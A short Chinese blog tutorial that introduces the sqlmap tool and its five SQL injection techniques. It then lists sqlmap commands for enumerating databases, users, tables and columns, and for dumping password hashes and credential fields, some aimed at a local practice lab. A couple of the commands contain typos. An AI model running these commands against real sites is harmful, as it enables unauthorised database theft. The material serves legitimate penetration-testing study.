简介

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:
1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中

4)联合查询注入,可以使用union的情况下的注入。

5)堆查询注入,可以同时执行多条语句的执行时的注入。

使用命令

测试注入:

python sqlmap.py -u url

查询当前使用数据库:

ython sqlmap.py -u "url" --current-db

查询当前数据库用户名:

python sqlmap.py -u "url" --current-user

列出数据库的所有用户

python sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --users

查询当前数据库所有密码:

python sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --passwords

查询所有数据库:

python sqlmap.py -u "url" --dbs

查询数据库下的所有表名:

python sqlmap.py -u "url" -D 库名 --tables

查询数据库下的所有字段名:

python sqlmap.py -u "url" -D 库名 -T 表名 --columns

查询数据库stormgroup下数据表membe下数据字段name,password的内容:

 python sqlmap.py "url" -D stormgroup -T member -C "name,password" --dump
最后修改:2023 年 07 月 21 日
如果觉得我的文章对你有用,请随意赞赏